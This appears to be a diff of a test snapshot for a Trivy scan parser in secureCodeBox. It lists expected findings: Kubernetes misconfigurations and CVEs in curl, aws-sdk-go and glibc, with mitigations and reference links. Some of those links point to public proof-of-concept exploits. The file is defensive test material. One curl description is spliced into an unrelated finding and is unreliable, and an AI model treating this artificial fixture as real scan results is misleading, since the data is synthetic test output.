"https://security.gentoo.org/glsa/202212-01", - "https://security.netapp.com/advisory/ntap-20230110-0006/", - "https://security.netapp.com/advisory/ntap-20230208-0002/", - "https://support.apple.com/kb/HT213604", - "https://support.apple.com/kb/HT213605", - "https://ubuntu.com/security/notices/USN-5702-1", - "https://ubuntu.com/security/notices/USN-5702-2", - "https://ubuntu.com/security/notices/USN-5823-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32221", - "https://www.debian.org/security/2023/dsa-5330", + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0069", ], }, - "category": "Vulnerability", - "description": "When doing HTTP(S) transfers, libcurl might erroneously use the read callback (\`CURLOPT_READFUNCTION\`) to ask for data to send, even when the \`CURLOPT_POSTFIELDS\` option has been set, if the same handle previously was used to issue a \`PUT\` request which used that callback. This flaw may surprise the application and cause it to misbehave and either send off the wrong data or use memory after free or similar in the subsequent \`POST\` request. The problem exists in the logic for a reused handle when it is changed from a PUT to a POST.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "POST following PUT confusion", + "category": "Misconfiguration", + "description": "Ensure that the kubelet service file has permissions of 600 or more restrictive.", + "location": "scb://trivy/?Kind=NodeInfo&Name=kind-control-plane", + "mitigation": "Change the kubelet service file /etc/systemd/system/kubelet.service.d/10-kubeadm.conf permissions of 600 or more restrictive ", + "name": "Ensure that the kubelet service file permissions are set to 600 or more restrictive(Ensure that the kubelet service file permissions are set to 600 or more restrictive)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32221", + "value": "https://avd.aquasec.com/misconfig/kcv0069", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2023/Jan/19", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'NodeInfo/kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0075", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0075", + ], + }, + "category": "Misconfiguration", + "description": "Ensure that the certificate authorities file has permissions of 600 or more restrictive.", + "location": "scb://trivy/?Kind=NodeInfo&Name=kind-control-plane", + "mitigation": "Change the certificate authorities file permissions to 600 or more restrictive if exist", + "name": "Ensure that the certificate authorities file permissions are set to 600 or more restrictive(Ensure that the certificate authorities file permissions are set to 600 or more restrictive)", + "references": [ { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2023/Jan/20", + "value": "https://avd.aquasec.com/misconfig/kcv0075", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/17/4", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'NodeInfo/kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0077", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0077", + ], + }, + "category": "Misconfiguration", + "description": "Ensure that if the kubelet refers to a configuration file with the --config argument, that file has permissions of 600 or more restrictive.", + "location": "scb://trivy/?Kind=NodeInfo&Name=kind-control-plane", + "mitigation": "Change the kubelet config yaml permissions to 600 or more restrictive if exist", + "name": "If the kubelet config.yaml configuration file is being used validate permissions set to 600 or more restrictive(Ensure that if the kubelet refers to a configuration file with the --config argument, that file has permissions of 600 or more restrictive.)", + "references": [ { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0333", + "value": "https://avd.aquasec.com/misconfig/kcv0077", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32221", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "HIGH", + }, +] +`; + +exports[`should parse a trivy-k8s scan result 1`] = ` +[ + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'manager' of Deployment 'securecodebox-controller-manager' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2135411", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2135411", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'manager' of Deployment 'securecodebox-controller-manager' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "https://curl.se/docs/CVE-2022-32221.html", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32221", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0333.html", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0333", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/securecodebox-controller-manager' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-controller-manager", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://hackerone.com/reports/1704017", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-32221.html", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2020-8911", + "installedVersion": "v1.40.54", + "packageName": "github.com/aws/aws-sdk-go", + "references": [ + "https://access.redhat.com/security/cve/CVE-2020-8911", + "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", + "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", + "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "https://github.com/aws/aws-sdk-go/pull/3403", + "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", + "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "https://nvd.nist.gov/vuln/detail/CVE-2020-8911", + "https://pkg.go.dev/vuln/GO-2022-0646", + "https://www.cve.org/CVERecord?id=CVE-2020-8911", + ], + }, + "category": "Vulnerability", + "description": "A padding oracle vulnerability exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. The SDK allows users to encrypt files with AES-CBC without computing a Message Authentication Code (MAC), which then allows an attacker who has write access to the target's S3 bucket and can observe whether or not an endpoint with access to the key can decrypt a file, they can reconstruct the plaintext with (on average) 128*length (plaintext) queries to the endpoint, by exploiting CBC's ability to manipulate the bytes of the next block and PKCS5 padding errors. It is recommended to update your SDK to V2 or later, and re-encrypt your files.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "mitigation": undefined, + "name": "aws/aws-sdk-go: CBC padding oracle issue in AWS S3 Crypto SDK for golang", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0333.html", + "value": "https://avd.aquasec.com/nvd/cve-2020-8911", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00028.html", + "value": "https://access.redhat.com/security/cve/CVE-2020-8911", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32221", + "value": "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202212-01", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230110-0006/", + "value": "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230208-0002/", + "value": "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213604", + "value": "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213605", + "value": "https://github.com/aws/aws-sdk-go/pull/3403", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5702-1", + "value": "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5702-2", + "value": "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5823-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8911", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32221", + "value": "https://pkg.go.dev/vuln/GO-2022-0646", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5330", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-8911", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-23914", - "installedVersion": "7.74.0-1.3+deb11u2", - "packageName": "libcurl4", + "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2020-8912", + "installedVersion": "v1.40.54", + "packageName": "github.com/aws/aws-sdk-go", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-23914", - "https://curl.se/docs/CVE-2023-23914.html", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23914", - "https://hackerone.com/reports/1813864", - "https://nvd.nist.gov/vuln/detail/CVE-2023-23914", - "https://security.netapp.com/advisory/ntap-20230309-0006/", - "https://ubuntu.com/security/notices/USN-5891-1", - "https://www.cve.org/CVERecord?id=CVE-2023-23914", + "https://access.redhat.com/security/cve/CVE-2020-8912", + "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "https://bugzilla.redhat.com/show_bug.cgi?id=1869801", + "https://github.com/advisories/GHSA-7f33-f4f5-xwgw", + "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "https://github.com/aws/aws-sdk-go/pull/3403", + "https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw", + "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "https://nvd.nist.gov/vuln/detail/CVE-2020-8912", + "https://pkg.go.dev/vuln/GO-2022-0646", + "https://www.cve.org/CVERecord?id=CVE-2020-8912", ], }, "category": "Vulnerability", - "description": "A cleartext transmission of sensitive information vulnerability exists in curl 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'coredns' of Deployment 'coredns' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2012/Jul/msg00001.html", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2012/May/msg00001.html", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'coredns' of Deployment 'coredns' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2013/Oct/msg00004.html", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV022", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv022", + ], + }, + "category": "Misconfiguration", + "description": "Adding NET_RAW or capabilities beyond the default set must be disallowed.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "mitigation": "Do not set spec.containers[*].securityContext.capabilities.add and spec.initContainers[*].securityContext.capabilities.add", + "name": "Non-default capabilities added(Container 'coredns' of Deployment 'coredns' should not set 'securityContext.capabilities.add')", + "references": [ { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", + "value": "https://avd.aquasec.com/misconfig/ksv022", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00051.html", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV030", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv030", + ], + }, + "category": "Misconfiguration", + "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", + "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", + "references": [ { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00009.html", + "value": "https://avd.aquasec.com/misconfig/ksv030", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00040.html", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=132750579901589&w=2", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=132872385320240&w=2", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2010-4756", + "installedVersion": "2.31-13+deb11u5", + "packageName": "libc6", + "references": [ + "http://cxib.net/stuff/glob-0day.c", + "http://securityreason.com/achievement_securityalert/89", + "http://securityreason.com/exploitalert/9223", + "https://access.redhat.com/security/cve/CVE-2010-4756", + "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "https://www.cve.org/CVERecord?id=CVE-2010-4756", + ], + }, + "category": "Vulnerability", + "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", + "references": [ { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=133365109612558&w=2", + "value": "https://avd.aquasec.com/nvd/cve-2010-4756", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=133728004526190&w=2", + "value": "http://cxib.net/stuff/glob-0day.c", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=134254866602253&w=2", + "value": "http://securityreason.com/achievement_securityalert/89", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=134254957702612&w=2", + "value": "http://securityreason.com/exploitalert/9223", }, { "type": "URL", - "value": "http://my.opera.com/securitygroup/blog/2011/09/28/the-beast-ssl-tls-issue", + "value": "https://access.redhat.com/security/cve/CVE-2010-4756", }, { "type": "URL", - "value": "http://osvdb.org/74829", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", }, { "type": "URL", - "value": "http://rhn.redhat.com/errata/RHSA-2012-0508.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", }, { "type": "URL", - "value": "http://rhn.redhat.com/errata/RHSA-2013-1455.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", }, { "type": "URL", - "value": "http://secunia.com/advisories/45791", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-20796", + "installedVersion": "2.31-13+deb11u5", + "packageName": "libc6", + "references": [ + "http://www.securityfocus.com/bid/107160", + "https://access.redhat.com/security/cve/CVE-2018-20796", + "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "https://security.netapp.com/advisory/ntap-20190315-0002/", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2018-20796", + ], + }, + "category": "Vulnerability", + "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "references": [ { "type": "URL", - "value": "http://secunia.com/advisories/47998", + "value": "https://avd.aquasec.com/nvd/cve-2018-20796", }, { "type": "URL", - "value": "http://secunia.com/advisories/48256", + "value": "http://www.securityfocus.com/bid/107160", }, { "type": "URL", - "value": "http://secunia.com/advisories/48692", + "value": "https://access.redhat.com/security/cve/CVE-2018-20796", }, { "type": "URL", - "value": "http://secunia.com/advisories/48915", + "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", }, { "type": "URL", - "value": "http://secunia.com/advisories/48948", + "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", }, { "type": "URL", - "value": "http://secunia.com/advisories/49198", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", }, { "type": "URL", - "value": "http://secunia.com/advisories/55322", + "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", }, { "type": "URL", - "value": "http://secunia.com/advisories/55350", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "http://secunia.com/advisories/55351", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010022", + "installedVersion": "2.31-13+deb11u5", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-1010022", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "https://ubuntu.com/security/CVE-2019-1010022", + "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "glibc: stack guard protection bypass", + "references": [ { "type": "URL", - "value": "http://security.gentoo.org/glsa/glsa-201203-02.xml", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", }, { "type": "URL", - "value": "http://security.gentoo.org/glsa/glsa-201406-32.xml", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT4999", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT5001", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT5130", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT5281", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT5501", + "value": "https://ubuntu.com/security/CVE-2019-1010022", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT6150", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010023", + "installedVersion": "2.31-13+deb11u5", + "packageName": "libc6", + "references": [ + "http://www.securityfocus.com/bid/109167", + "https://access.redhat.com/security/cve/CVE-2019-1010023", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010023", + "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", + "references": [ { "type": "URL", - "value": "http://technet.microsoft.com/security/advisory/2588513", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", }, { "type": "URL", - "value": "http://vnhacker.blogspot.com/2011/09/beast.html", + "value": "http://www.securityfocus.com/bid/109167", }, { "type": "URL", - "value": "http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", }, { "type": "URL", - "value": "http://www.debian.org/security/2012/dsa-2398", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", }, { "type": "URL", - "value": "http://www.educatedguesswork.org/2011/09/security_impact_of_the_rizzodu.html", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", }, { "type": "URL", - "value": "http://www.ibm.com/developerworks/java/jdk/alerts/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", }, { "type": "URL", - "value": "http://www.imperialviolet.org/2011/09/23/chromeandbeast.html", + "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "http://www.insecure.cl/Beast-SSL.rar", + "value": "https://ubuntu.com/security/CVE-2019-1010023", }, { "type": "URL", - "value": "http://www.kb.cert.org/vuls/id/864643", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010024", + "installedVersion": "2.31-13+deb11u5", + "packageName": "libc6", + "references": [ + "http://www.securityfocus.com/bid/109162", + "https://access.redhat.com/security/cve/CVE-2019-1010024", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + 